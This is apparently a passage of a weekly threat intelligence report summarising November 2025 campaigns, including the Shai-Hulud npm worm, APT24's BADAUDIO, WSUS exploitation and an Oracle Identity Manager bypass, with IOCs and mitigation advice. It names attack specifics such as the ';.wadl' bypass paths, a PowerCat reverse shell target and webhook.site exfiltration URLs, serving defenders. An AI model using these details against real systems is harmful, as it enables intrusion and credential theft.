Manufacturing, Retail, Technology Hardware, Telecommunications Victim Countries: Australia, Austria, Belgium, Bolivia, Brazil, Canada, Chile, China, Croatia, Czech Republic, Egypt, France, Greece, Italy, Japan, Kazakhstan, Mexico, Morocco, Netherlands, Philippines, Russia, Saudi Arabia, South Africa, Taiwan, Thailand, Turkey, United Kingdom, United States Mitigation Advice Add the IP address 81.88.18.108 to the network firewall blocklist to prevent connections to and from the ShadowV2 malware delivery server. Use your SIEM or EDR solution to search for executions of a script named 'binary.sh' and the presence of any files with the prefix 'shadow' on all endpoints. Scan the network to identify all devices running DD-WRT firmware and immediately update any vulnerable instances to a version that patches CVE-2009-2765. Scan the network to identify all D-Link devices vulnerable to CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, or CVE-2024-10915. Apply vendor patches where available or isolate and plan for the replacement of end-of-life devices. Scan the network to identify TBK DVRs vulnerable to CVE-2024-3721. Since no patch is available, isolate these devices from the network immediately and prioritize their replacement. Scan the network to identify all TP-Link routers vulnerable to CVE-2024-53375 and apply the necessary firmware updates immediately. Compliance Best Practices Design and implement a separate network segment (VLAN) for all IoT devices to isolate them from critical business systems and user networks. Develop and enforce an IoT security policy that defines standards for the procurement, deployment, configuration, and lifecycle management of all connected devices. Establish a formal vulnerability management program that includes regular, automated scanning of all network assets, including IoT devices, to proactively identify and remediate vulnerabilities. Implement a default-deny egress filtering policy on the network firewall, allowing outbound connections only for specifically approved protocols, ports, and destinations required for business operations. Implement a Cloud Security Posture Management (CSPM) tool to continuously monitor AWS environments for misconfigurations and security risks in EC2 instances and other services. ASUS Warns of Critical Auth Bypass Flaw (CVE-2025-59366) in AiCloud Routers ASUS has released new firmware to address nine security vulnerabilities, including a critical authentication bypass flaw, CVE-2025-59366, affecting its routers with AiCloud enabled. This vulnerability, stemming from an unintended side effect of Samba functionality, allows remote attackers to execute specific functions without proper authorization by chaining path traversal and OS command injection weaknesses, requiring low complexity and no user interaction. Users are strongly advised to update their router firmware to the latest versions, specifically those in the `3.0.0.4_386,` `3.0.0.4_388,` and `3.0.0.6_102` series. For end-of-life models that will not receive updates, mitigation steps include disabling all internet-accessible services such as remote access from WAN, port forwarding, DDNS, VPN server, DMZ, port triggering, and FTP, as well as cutting remote access to devices running vulnerable AiCloud software, and employing strong passwords for router administration and wireless networks. This follows a previous critical authentication bypass, CVE-2025-2492, patched in April, which was exploited in "Operation WrtHug" to compromise thousands of ASUS WRT routers globally. Severity: Critical Sources https://buaq.net/go-378236.html https://cyberinsider.com/asus-patches-critical-vulnerabilities-in-routers-and-pc-software/ https://meterpreter.org/asus-patches-critical-aicloud-flaw-cve-2025-59366-allowing-remote-router-takeover/ https://securityonline.info/8-flaws-asus-routers-urgently-need-patch-for-authentication-bypass-cve-2025-59366-cvss-9-4/ https://www.bleepingcomputer.com/news/security/asus-warns-of-new-critical-auth-bypass-flaw-in-aicloud-routers/ https://www.hkcert.org/security-bulletin/asus-router-multiple-vulnerabilities_20251126 Threat Details and IOCs Malware: PoisonPlug, RingReaper, ShadowPad CVEs: CVE-2023-41345, CVE-2023-41348, CVE-2024-12912, CVE-2025-12003, CVE-2025-2492, CVE-2025-59365, CVE-2025-59366, CVE-2025-59368, CVE-2025-59369, CVE-2025-59370, CVE-2025-59371, CVE-2025-59372, CVE-2025-59373 Technologies: ASUS, ASUS ASUSWRT, ASUS Router, ASUSWRT, Linux, Microsoft Windows, Samba Threat Actors: AyySSHush Attacker Countries: China Victim Industries: Consumer Electronics, Hospitality, Retail, Technology Hardware Victim Countries: Austria, Brunei, Cambodia, Croatia, Czech Republic, Germany, Hungary, Indonesia, Laos, Liechtenstein, Malaysia, Myanmar, Philippines, Poland, Russia, Singapore, Slovakia, Slovenia, Switzerland, Taiwan, Thailand, Timor-Leste, United States, Vietnam Mitigation Advice Identify all ASUS routers on the network and update their firmware to the latest version to patch CVE-2025-59366 and other listed vulnerabilities. For any ASUS routers that cannot be immediately patched or do not require the AiCloud feature, disable AiCloud to remove the primary attack vector for CVE-2025-59366. On unpatchable or end-of-life ASUS routers, disable all remote administration access from the WAN. On unpatchable or end-of-life ASUS routers, disable the built-in VPN server functionality to reduce the external attack surface. Review and disable all non-essential port forwarding, DMZ, and port triggering rules on ASUS routers that cannot be updated. On unpatchable or end-of-life ASUS routers, disable the built-in FTP server to prevent potential exploitation. Compliance Best Practices Establish and enforce a hardware lifecycle management policy to ensure network devices like routers are replaced before they reach end-of-life and no longer receive security patches. Implement a network security policy that requires all non-essential services on internet-facing devices to be disabled by default. Enforce a strong password policy for all network device administrative accounts, requiring unique, complex passwords and periodic audits for compliance. Develop a formal vulnerability management program that includes regular, automated scanning of all network perimeter devices to identify outdated firmware, open ports, and insecure configurations. Stay updated on emerging threats: sign up for the F5 Threat Report to receive the Weekly Threat Report in your inbox.F5 Threat Report - November 26th, 2025
Shai-Hulud 2.0 npm Supply Chain Attack Steals Credentials A new npm supply-chain campaign, dubbed Shai-Hulud 2.0, has compromised numerous popular packages, including those from Zapier, ENS Domains, PostHog, and Postman, by leveraging compromised maintainer accounts to publish trojanized versions. This variant executes malicious code during the `preinstall` phase, leading to credential theft and exfiltration of developer and CI/CD secrets to GitHub repositories named "Shai-Hulud." The attack, observed between November 21-23, 2025, creates files like `cloud.json`, `contents.json`, `environment.json`, `truffleSecrets.json`, and attempts to create `discussion.yaml`. Key indicators of compromise include specific package versions (e.g., `@zapier/zapier-sdk` 0.15.5-0.15.7, `@ensdomains/ens-validation` 0.1.1, `@posthog/agent` 1.24.1), the presence of `pre-install` scripts, a GitHub Actions workflow named `shai-hulud-workflow.yml`, access to cloud metadata endpoints, outbound connections to `webhook[.]site`, and `data.json` files containing encoded secrets. Immediate actions recommended include removing and replacing compromised packages, clearing npm cache, pinning dependencies to known clean versions or rolling back to pre-November 21, 2025 builds, revoking and regenerating npm tokens, GitHub PATs, SSH keys, and cloud provider credentials, enforcing phishing-resistant MFA, searching for "Shai-Hulud" repositories, reviewing for unauthorized workflows, monitoring new npm publishes, restricting or disabling lifecycle scripts in CI/CD, limiting outbound network access, and using short-lived, scoped automation tokens. Severity: Critical Sources https://cyberinsider.com/second-wave-of-shai-hulud-npm-malware-hits-zapier-ens-domains/ https://financefeeds.com/shai-hulud-malware-hits-400-javascript-packages-in-major-npm-supply-chain-attack/ https://gbhackers.com/zapiers-npm-account-hacked-multiple-packages-infected/ https://hackread.com/shai-hulud-npm-worm-supply-chain-attack/ https://securitylabs.datadoghq.com/articles/supply-chain-attacks-runtime-security-detection/ https://thehackernews.com/2025/11/second-sha1-hulud-wave-affects-25000.html https://www.bitcoininsider.org/article/293565/shai-hulud-malware-hits-npm-crypto-libraries-face-growing-security-crisis https://www.bleepingcomputer.com/news/security/shai-hulud-malware-infects-500-npm-packages-leaks-secrets-on-github/ https://www.hendryadrian.com/shai-hulud-npm-attack-what-you-need-to-know/ https://www.theregister.com/2025/11/24/shai_hulud_npm_worm/ https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack Threat Details and IOCs Malware: Anivia Stealer, Sha1-Hulud, SHA1-HULUD, Shai Hulud, Shai-Hulud, ZeroTrace Stealer CVEs: CVE-2025-10894, CVE-2025-59037, CVE-2025-59140, CVE-2025-59141, CVE-2025-59142, CVE-2025-59143, CVE-2025-59144, CVE-2025-59162, CVE-2025-59330, CVE-2025-59331, CVE-20S-59143 Technologies: Amazon Web Services, Amazon Web Services (AWS), Apple macOS, AsyncAPI, Bun, Ethereum, Ethereum Name Service, GitHub, GitHub Actions, Google Cloud Platform, Google Cloud Platform (GCP), Kubernetes, Linux, Microsoft Azure, Microsoft Windows, Node.js, npm, PostHog, Postman, SSH, Vercel Next.js, Zapier Attacker Domains: bun.sh, shai-hulud-2.github.io, webhook.site Attacker URLs: bun.sh/install.ps1, https://bun.sh/install, https://github.com/asyncapi/cli/blob/2efa4dff59bc3d3cecdf897ccf178f99b115d63d/bun_environment.js, https://github.com/search?q=Sha1-Hulud%3A+The+Second+Coming.&ref=opensearch&type=repositories, hxxps://shai-hulud-2.github.io/data.json, hxxps://webhook.site/a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6, hxxps://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7 Attacker Hashes: 2efa4dff59bc3d3cecdf897ccf178f99b115d63d Victim Industries: Critical Manufacturing, Cryptocurrency, Financial Services, Healthcare, Information Technology, Manufacturing, Software, Technology Hardware Victim Countries: Belgium, Cayman Islands, United States Mitigation Advice Scan all development and CI/CD environments for the specific compromised npm packages and versions listed in the article. If any compromised npm packages are found, remove them, clear the npm cache, and delete the `node_modules` directory from the affected project. Block all outbound network connections from build servers and developer workstations to `webhook[.]site` at the network firewall. Search all company-managed GitHub organizations for newly created repositories containing "Shai-Hulud" in the title or description. Scan all GitHub repositories for the presence of a workflow file named `shai-hulud-workflow.yml`. Immediately revoke and regenerate all npm tokens, GitHub Personal Access Tokens (PATs), and SSH keys used in development and CI/CD environments. Immediately revoke and regenerate all cloud provider credentials, such as AWS IAM roles or GCP service account keys, accessible from CI/CD environments. Compliance Best Practices Implement and enforce a strict policy for all development projects to pin npm package dependencies to specific, audited versions using a lock file. Update CI/CD pipeline configurations to disable or restrict the execution of npm lifecycle scripts, such as `preinstall` and `postinstall`, by default. Enforce the use of phishing-resistant Multi-Factor Authentication (MFA) for all developer and administrator accounts on code repositories like GitHub and package registries like npm. Implement network egress filtering on all CI/CD build runners to only allow outbound connections to a pre-approved list of essential domains. Re-architect CI/CD pipelines to use dynamically generated, short-lived, and narrowly-scoped access tokens for authentication instead of static, long-lived credentials. Implement automated monitoring to generate security alerts for any new packages published to public registries under your organization's name or scopes. APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains A China-nexus threat actor, APT24 (also known as Pitty Tiger), has been observed deploying a previously undocumented malware named BADAUDIO in a nearly three-year espionage campaign primarily targeting Taiwan, alongside government, healthcare, construction, mining, non-profit, and telecommunications sectors in the U.S. BADAUDIO, a highly obfuscated C++ first-stage downloader, utilizes control flow flattening to resist reverse engineering and leverages DLL Search Order Hijacking for execution. It gathers system information, exfiltrates it, and downloads AES-encrypted payloads, such as Cobalt Strike Beacon. Initial access vectors include watering holes, where over 20 legitimate websites were compromised from November 2022 to September 2025 to inject JavaScript that targeted Windows users with fake Google Chrome update pop-ups using FingerprintJS. A significant supply chain compromise occurred in July 2024 when APT24 breached a Taiwanese digital marketing firm, injecting malicious JavaScript into a widely used library, affecting over 1,000 domains. Targeted phishing campaigns, active since August 2024, use animal rescue lures and tracking pixels to deliver BADAUDIO via encrypted archives hosted on Google Drive and Microsoft OneDrive. Separately, another China-nexus threat actor, codenamed Autumn Dragon, has conducted a sustained espionage campaign against government, media, and news sectors in Laos, Cambodia, Singapore, the Philippines, and Indonesia. This campaign exploits a WinRAR vulnerability (CVE-2025-8088, CVSS 8.8) via spear-phishing with malicious RAR archives, leading to DLL sideloading using legitimate executables like `obs-browser-page.exe` and `Creative Cloud Helper.exe` to establish persistence, communicate via Telegram for reconnaissance, and deploy a C++ implant capable of executing various commands. Severity: Critical Sources https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/ https://securityonline.info/chinas-apt24-launches-stealth-badaudio-malware-hitting-1000-domains-via-taiwanese-supply-chain-hack/ https://thehackernews.com/2025/11/apt24-deploys-badaudio-in-years-long.html https://www.hendryadrian.com/apt24s-pivot-to-multi-vector-attacks-google-cloud-blog/ https://www.hendryadrian.com/beyond-the-watering-hole-apt24s-pivot-to-multi-vector-attacks/ https://www.securitylab.ru/news/566430.php https://www.securityweek.com/chinese-cyberspies-deploy-badaudio-malware-via-supply-chain-attacks/ Threat Details and IOCs Malware: Agentemis, BadAudio, BADAUDIO, Beacon, BEACON, Cobalt Strike, CobaltStrike, Cobalt Strike Beacon, cobeacon, Enfal, Gh0st, Gh0st RAT, Lurid Downloader, Roudan, Specas, Taidoor CVEs: CVE-2012-0158, CVE-2014-1761, CVE-2025-8088 Technologies: Adobe Creative Cloud, Google Chrome, Google Drive, Microsoft OneDrive, Microsoft Windows, RARLAB WinRAR Threat Actors: APT24, AutumnDragon, EarthAughisky, G0011, PITTY PANDA, PittyTiger, Taidoor, Temp.Pittytiger, TempPittytiger Attacker Countries: China Attacker Domains: clients.brendns.workers.dev, jarzoda.net, jsdelivrs.com, public.megadatacloud.com, roller.johallow.workers.dev, taiwantradoshows.com, tradostw.com, trcloudflare.com, wispy.geneva.workers.dev, www.availableextens.com, www.brighyt.com, www.cundis.com, www.decathlonm.com, www.gerikinage.com, www.growhth.com, www.p9-car.com, www.twisinbeth.com Attacker URLs: https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js, https://wispy.geneva.workers.dev/pub/static/img/merged?version=65feddea0367, https://www.twisinbeth.com/query.php, https://www.twisinbeth.com/query.php?id= Attacker Hashes: 032c333eab80d58d60228691971d79b2c4cd6b9013bae53374dd986faa0f3f4c, 07226a716d4c8e012d6fabeffe2545b3abfc0b1b9d2fccfa500d3910e27ca65b, 0e98baf6d3b67ca9c994eb5eb9bbd40584be68b0db9ca76f417fb3bcec9cf958, 176407b1e885496e62e1e761bbbb1686e8c805410e7aec4ee03c95a0c4e9876f, 1f31ddd2f598bd193b125a345a709eedc3b5661b0645fc08fa19e93d83ea5459, 2ea075c6cd3c065e541976cdc2ec381a88b748966f960965fdbe72a5ec970d4e, 55e02a81986aa313b663c3049d30ea0158641a451cb8190233c09bef335ef5c7, 5c37130523c57a7d8583c1563f56a2e2f21eef5976380fdb3544be62c6ad2de5, 83fb652af10df4574fa536700fa00ed567637b66f189d0bbdb911bd2634b4f0e, 88fa2b5489d178e59d33428ba4088d114025acd1febfa8f7971f29130bda1213, 9ce49c07c6de455d37ac86d0460a8ad2544dc15fb5c2907ed61569b69eefd182, ae8473a027b0bcc65d1db225848904e54935736ab943edf3590b847cb571f980, c4e910b443b183e6d5d4e865dd8f978fd635cd21c765d988e92a5fd60a4428f5, c7565ed061e5e8b2f8aca67d93b994a74465e6b9b01936ecbf64c09ac6ee38b9, cfade5d162a3d94e4cba1e7696636499756649b571f3285dd79dea1f5311adcd, d23ca261291e4bad67859b5d4ee295a3e1ac995b398ccd4c06d2f96340b4b5f8, f086c65954f911e70261c729be2cdfa2a86e39c939edee23983090198f06503c, f1e9d57e0433e074c47ee09c5697f93fde7ff50df27317c657f399feac63373a Victim Industries: Advertising Services, Arts, Entertainment, and Recreation, Construction, Engineering, Government, Healthcare, Industrials, Marketing & Advertising, Mining, Multimedia, Non-Governmental Organizations (NGOs), Retail, Telecommunications Victim Countries: Cambodia, Indonesia, Laos, Philippines, Singapore, Taiwan, United States Mitigation Advice Immediately patch all instances of WinRAR to version 7.13 or later to mitigate the actively exploited vulnerability CVE-2025-8088. Block the domain 'public.megadatacloud[.]com' at the network perimeter using your firewall, web proxy, or DNS filtering solution. Use your endpoint detection and response (EDR) tool to hunt for the legitimate executables 'obs-browser-page.exe' or 'Creative Cloud Helper.exe' loading malicious DLLs named 'libcef.dll' or 'CRClient.dll'. Configure endpoint detection rules to alert on legitimate applications loading DLLs from non-standard paths or user-writable directories to detect potential DLL Search Order Hijacking. Configure security controls to block or perform enhanced content inspection on encrypted archives downloaded from Google Drive. Configure security controls to block or perform enhanced content inspection on encrypted archives downloaded from Microsoft OneDrive. Compliance Best Practices Develop and implement a continuous security awareness training program that educates users on identifying and reporting phishing attempts, especially those with suspicious attachments or links to cloud services. Establish a vendor risk management program to vet and continuously monitor the security posture of third-party suppliers, particularly those who provide code or services integrated into your company's websites. Deploy an application control solution, such as AppLocker or a third-party tool, to restrict software execution to only authorized applications, scripts, and DLLs. Implement a network egress filtering policy that denies all outbound traffic by default and only allows connections to known-good domains and ports required for business operations. Harden PowerShell across the environment by enabling Constrained Language Mode and forwarding all PowerShell script block and module logs to a centralized SIEM for analysis. Implement Subresource Integrity (SRI) on all corporate websites to ensure that third-party JavaScript libraries and other resources are not modified without authorization. Chinese Hackers Exploiting WSUS Remote Code Execution Vulnerability to Deploy ShadowPad Malware Chinese hackers are actively exploiting CVE-2025-59287, a critical remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), to deploy the ShadowPad backdoor malware. Microsoft issued a security advisory for this vulnerability on October 14, 2025, with public proof-of-concept exploits emerging on October 22, 2025. The attack initiates by exploiting the WSUS vulnerability to execute PowerCat, establishing a reverse shell to 154.17.26.41 on port 8080. Subsequently, on November 6, 2025, attackers utilized legitimate Windows utilities such as curl.exe and certutil.exe to install ShadowPad. This modular backdoor, associated with Chinese state-sponsored APT groups, employs DLL side-loading techniques involving components like ETDCtrlHelper.exe, ETDApix.dll, and 0C137A80.tmp, and establishes persistence through Windows Registry modifications, scheduled tasks, and service creation under the identifier "Q-X64." It communicates with command-and-control servers at 163.61.102.245 via HTTP/HTTPS on port 443, using Firefox user-agent strings and injecting into processes such as Windows Mail, Windows Media Player, and svchost.exe. Organizations must immediately apply the security update for CVE-2025-59287, audit WSUS server exposure to block inbound traffic on TCP ports 8530 and 8531 from non-Microsoft Update sources, and conduct threat hunting for suspicious PowerShell execution (specifically involving certutil.exe and curl.exe) and network connections to the identified C2 infrastructure. Severity: Critical Sources https://bluefire-redteam.com/cve-2025-59287-deep-dive-response-playbook-and-siem-edr-detection-recipes/ https://buaq.net/go-371618.html https://buaq.net/go-373861.html https://buaq.net/go-375698.html https://cyberpress.org/cisa-alerts-on-active-exploitation-of-windows-server-update-services-rce-flaw/ https://cyberpress.org/cisa-warns-wsus-vulnerability/ https://cyberpress.org/hackers-exploit-wsus-vulnerability-to-steal-sensitive-organizational-data/ https://cyberpress.org/microsofts-wsus-patch/ https://cyberpress.org/shadowpad-malware/ https://cyberpress.org/tcp-ports-8530-8531-wsus/ https://cyberscoop.com/microsoft-windows-server-update-services-vulnerability-exploited-attacks/ https://gbhackers.com/attackers-exploit-windows-server-update-services-flaw/ https://gbhackers.com/cisa-alerts-on-of-wsus-vulnerability/ https://gbhackers.com/hackers-actively-scanning-tcp-ports-8530-8531/ https://gbhackers.com/microsofts-wsus-patch-causes-hotpatching-failures/ https://gbhackers.com/wsus-vulnerability/ https://hackread.com/hackers-exploit-wsus-skuld-stealer-microsoft-patch/ https://horizon3.ai/attack-research/vulnerabilities/cve-2025-59287/ https://hothardware.com/news/windows-server-update-service-is-under-attack https://isc.sans.edu/diary/rss/32440 https://latesthackingnews.com/2025/10/28/microsoft-october-patch-tuesday-is-huge-with-170-fixes/ https://meterpreter.org/windows-server-wsus-flaw-under-active-attack-cve-2025-59287-cvss-9-8-with-public-poc/ https://orca.security/resources/blog/cve-2025-59287-critical-wsus-rce/ https://securityboulevard.com/2025/10/critical-microsoft-wsus-security-flaw-is-being-actively-exploited/ https://securityboulevard.com/2025/10/windows-server-update-service-wsus-remote-code-execution-vulnerability-cve-2025-59287/ https://securityonline.info/critical-wsus-rce-cve-2025-59287-actively-exploited-to-deploy-shadowpad-backdoor/ https://socprime.com/blog/cve-2025-59287-detection/ https://thehackernews.com/2025/10/cisa-and-nsa-issue-urgent-guidance-to.html https://www.bitdefender.com/en-us/blog/businessinsights/bitdefender-advisory-critical-unauthenticated-rce-windows-server-update-services-cve-2025-59287 https://www.bleepingcomputer.com/news/microsoft/microsoft-patch-for-wsus-flaw-disabled-windows-server-hotpatching/ https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-windows-server-wsus-flaw-exploited-in-attacks/ https://www.esecurityplanet.com/news/wsus-vulnerability/ https://www.helpnetsecurity.com/2025/10/30/wsus-vulnerability-infostealer-cve-2025-59287/ https://www.hendryadrian.com/analysis-of-shadowpad-attack-exploiting-wsus-remote-code-execution-vulnerability-cve-2025-59287/ https://www.hendryadrian.com/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability-cve-2025-59287/ https://www.hendryadrian.com/microsoft-wsus-remote-code-execution-cve-2025-59287-actively-exploited-in-the-wild/ https://www.infosecurity-magazine.com/news/actively-exploited-wsus-bug-cisa/ https://www.scworld.com/brief/attacks-involving-critical-wsus-vulnerability-under-investigation https://www.scworld.com/brief/dozens-impacted-by-active-wsus-vulnerability-abuse https://www.theregister.com/2025/10/27/microsoft_wsus_attacks_multiple_orgs/ Threat Details and IOCs Malware: Alureon, BadCandy, BADCANDY, CryptoDefense, CryptoLocker, GlassWorm, Gokcpdoor, Locky, Lukitus, Msevents, MS Juan, PoisonPlug, POISONPLUG.SHADOW, SesameOp, ShadowPad, Skuld, Skuld Stealer, Stealit, TDL3, TDL-4, TDSS, Tidserv, TMPN Stealer, Virtumonde, Vundo, WinFixer CVEs: CVE-2024-11972, CVE-2024-9234, CVE-2024-9707, CVE-2025-0033, CVE-2025-24052, CVE-2025-24990, CVE-2025-2884, CVE-2025-47827, CVE-2025-49708, CVE-2025-55315, CVE-2025-59218, CVE-2025-59230, CVE-2025-59246, CVE-2025-59287 Technologies: Microsoft Entra ID, Microsoft Exchange Server, Microsoft Internet Information Services, Microsoft .NET Framework, Microsoft Windows, Microsoft Windows Server, Microsoft Windows Server Update Services, QNAP NetBak PC Agent, WordPress Threat Actors: APT17, APT23, APT41, AquaticPanda, DaggerPanda, EarthLusca, Skuld, TontoTeam, UNC6512, WetPanda, WickedPanda Attacker Countries: China Attacker IPs: 129.153.98.207, 134.122.38.84, 149.28.78.189, 154.17.26.41, 158.247.199.185, 163.61.102.245, 207.180.254.242, 45.158.12.7 Attacker Domains: api.braintreegateway.com, api.stripe.com, asec.ahnlab.com, avatars.githubusercontent.com, billing.epac.to, cybaq.chtq.net, dscriy.chtq.net, i.ibb.co, loglog.ac.d189493a.digimg.store, raw.githubusercontent.com, remote-auth-gateway.discord.gg, royal-boat-bf05.qgtxtebl.workers.dev, webhook.site, workersdev, wsus.ac.d189493a.digimg.store, yogswgeacbepthpjozvsf8frv90962ejy.oast.fun, ysoserial.net Attacker URLs: HTTP://163.61.102.245:443, HTTPS://163.61.102.245:443, https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts, https://api.stripe.com/v*/tokens, https://asec.ahnlab.com/wp-admin/admin-ajax.php, https://asec.ahnlab.com/wp-content/plugins/elementor-pro/assets/, https://asec.ahnlab.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.16.1, https://asec.ahnlab.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?m=1709594534, https://asec.ahnlab.com/wp-content/plugins/elementor-pro/modules/lottie/assets/animations/default.json, https://asec.ahnlab.com/wp-json/, https://avatars.githubusercontent.com/u/145487845?v=4, https://discordapp.com/api/v*/auth/sessions, https://*.discord.com/api/v*/auth/sessions, https://discord.com/api/v*/auth/sessions, https://i.ibb.co/GJGXzGX/discord-avatar-512-FCWUJ.png, https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1, https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js, http://webhook.site/REDACTED, hxxp://134.122.38.84/dl, hxxp://134.122.38.84/ex, hxxp://149.28.78.189:42306, hxxp://149.28.78.189:42306/dll.txt, hxxp://149.28.78.189:42306/exe.txt, hxxp://149.28.78.189:42306/tmp.txt, hxxps://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi, hxxps://webhook.site/0f20cd3b-e570-4205-8049-c37627af0f5c, hxxps://webhook.site/7b483bdd-5134-4671-b9cd-310800303f32, hxxp://webhook.site/22b6b8c8-2e07-4878-a681-b772e569aa6a, hxxp://webhook.site/5771a289-0b13-4ee7-902a-21147cac31ef, hxxp://webhook.site/94f6da9d-b785-461b-bc5e-bbce7acaa35c, hxxp://yogswgeacbepthpjozvsf8frv90962ejy.oast.fun/check, wss://remote-auth-gateway.discord.gg/* Attacker Hashes: 27e00b5594530e8c5e004098eef2ec50, 3ebeb4e08c82b220365b1e7dd0cc199b765eed91, 564e7d39a9b6da3cf0da3373351ac717, 85b935e80e84dd47e0fa5e1dfb2c16f4, 9d686ceed21877821ab6170a348cc073, a0f65fcd3b22eb8b49b2a60e1a7dd31c, f7d8c52bec79e42795cf15888b85cbad Victim Industries: Aerospace, Construction, Critical Manufacturing, Education, Energy, Financial Services, Government, Healthcare, Health Care Technology, Information, Information and Communication, Information Technology, Logistics, Manufacturing, Multimedia, Public Health, Public Safety, Retail, Software, Technology Hardware, Telecommunications, Transportation, Utilities Victim Countries: Afghanistan, Germany, Malaysia, Netherlands, Pakistan, Taiwan, United States Mitigation Advice Immediately apply the security update for CVE-2025-59287 to all Windows Servers running the WSUS service. Create rules on the perimeter firewall to block all inbound and outbound traffic to IP addresses 154.17.26.41 and 163.61.102.245. Configure host-based and network firewalls to restrict inbound access to WSUS servers on TCP ports 8530 and 8531, allowing connections only from required Microsoft Update IP ranges. Use your EDR solution or other endpoint scanning tools to conduct a targeted search across all servers for the files `ETDApix.dll` and `0C137A80.tmp`. In your SIEM or EDR, search for executions of `curl.exe` or `certutil.exe` on WSUS servers that are followed by the creation of new executable files or services. Scan for any newly created scheduled tasks or system services on WSUS servers, paying special attention to any containing the identifier "Q-X64". Compliance Best Practices Review and re-architect network segmentation to ensure critical internal infrastructure like WSUS servers are not directly accessible from the internet and are isolated from general user subnets. Develop and deploy advanced EDR and SIEM detection rules to alert on anomalous use of built-in Windows utilities (e.g., `powershell.exe`, `certutil.exe`, `curl.exe`), especially when initiated by web server processes like w3wp.exe. Plan and implement an application control solution, such as Windows Defender Application Control (WDAC), on critical servers to restrict executable and script execution to only known, authorized software. Formalize and resource a vulnerability management program that prioritizes patching based on threat intelligence and mandates strict SLAs for critical vulnerabilities on high-value assets. Implement TLS/SSL inspection on network egress points to enable detection of malicious C2 communications hiding within encrypted web traffic. GlobalProtect VPN Portals Probed with 2.3 Million Scan Sessions Malicious scanning activity targeting Palo Alto Networks GlobalProtect VPN login portals increased 40 times within 24 hours, starting November 14, 2025, signaling a coordinated campaign. Real-time intelligence company GreyNoise observed 2.3 million scan sessions between November 14 and 19, specifically probing the `*/global-protect/login.esp` URI, which is the web endpoint for VPN user authentication. This surge follows previous spikes reported by GreyNoise in April and October 2025, with the current activity linked to earlier campaigns through recurring TCP/JA4t fingerprints and shared Autonomous System Numbers (ASNs), primarily AS200373 (3xK Tech GmbH) with IPs largely from Germany and Canada, and AS208885 (Noyobzoda Faridduni Saidilhom). Login attempts are predominantly directed at the United States, Mexico, and Pakistan. GreyNoise highlights that these scanning spikes often precede the disclosure of new security flaws, a correlation particularly strong for Palo Alto Networks products, noting past incidents like the active exploitation of CVE-2025-0108 (chained with CVE-2025-0111 and CVE-2024-9474) in February and a data breach in September. Severity: Critical Sources https://cyberpress.org/2-3-million-attacks-hit-palo-alto-networks-globalprotect-vpn-portals/ https://www.bleepingcomputer.com/news/security/globalprotect-vpn-portals-probed-with-23-million-scan-sessions/ https://www.securitylab.ru/news/566393.php Threat Details and IOCs Malware: Alureon, CryptoDefense, CryptoLocker, CryptorBit, HowDecrypt, Locky, Lukitus, MS Juan, Odin, TDL-4, TDSS, Thor, Tidserv, Virtumonde, Vundo, Zepto CVEs: CVE-2024-9474, CVE-2025-0108, CVE-2025-0111, CVE-2025-0140, CVE-2025-0141, CVE-2025-2183 Technologies: Apple macOS, Linux, Microsoft Windows, Palo Alto Networks Threat Actors: ShinyHunters Attacker Countries: Canada, Germany Attacker URLs: /global-protect/login.esp Victim Industries: Automotive, Business Services, Education, Financial Services, Government, Healthcare, Industrial Control Systems, Information Technology, Manufacturing, Oil & Gas, Public Sector, Retail, Transportation, Utilities Victim Countries: Mexico, Pakistan, United States Mitigation Advice Verify that all Palo Alto Networks PAN-OS devices are patched against vulnerabilities CVE-2025-0108, CVE-2025-0111, and CVE-2024-9474. Query firewall, VPN, and web proxy logs for inbound connection attempts to the URI path containing '/global-protect/login.esp' to identify potential targeting. Implement firewall rules to block all inbound traffic from Autonomous System Numbers AS200373 and AS208885. Compliance Best Practices Reconfigure network architecture to ensure the Palo Alto Networks GlobalProtect management interface is not exposed to the public internet and is only accessible from a trusted internal network segment. Configure SIEM or other log monitoring tools to establish a baseline for normal traffic to the GlobalProtect VPN portal and create alerts for significant deviations or anomalous increases in login attempts. Establish a comprehensive vulnerability management program that includes regular, authenticated scanning of all internet-facing infrastructure and defines service-level agreements (SLAs) for patching critical vulnerabilities. Active Exploitation of Oracle Identity Manager CVE-2025-61757 Observed in September Active exploitation attempts for CVE-2025-61757, an Oracle Identity Manager vulnerability, were observed between August 30th and September 9th, preceding Oracle's patch release on October 21st as part of their Critical Patch Update. This vulnerability, initially reported by Searchlight Cyber, enables authentication bypass and potential remote code execution by appending `;.wadl` to URLs, exemplified by `/iam/governance/applicationmanagement/templates;.wadl`. Logs indicate scans targeting `/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl` via POST requests containing a 556-byte payload. Multiple IP addresses (89.238.132.76, 185.245.82.81, 138.199.29.153) were involved, all using the consistent User Agent: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`. These same IP addresses were also noted scanning for CVE-2025-4581 (Liferay Portal), bug bounty targets, and Log4j exploits. Severity: Critical Sources https://buaq.net/go-377039.html https://isc.sans.edu/diary/rss/32506 https://www.securityweek.com/critical-oracle-identity-manager-flaw-possibly-exploited-as-zero-day/ Threat Details and IOCs Malware: Aisuru, BadAudio, Sturnus, TurboMirai CVEs: CVE-2025-4581, CVE-2025-61757 Technologies: Oracle Fusion Middleware, Oracle Identity Manager Attacker IPs: 138.199.29.153, 185.245.82.81, 89.238.132.76 Attacker URLs: /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl, /iam/governance/applicationmanagement/templates;.wadl, 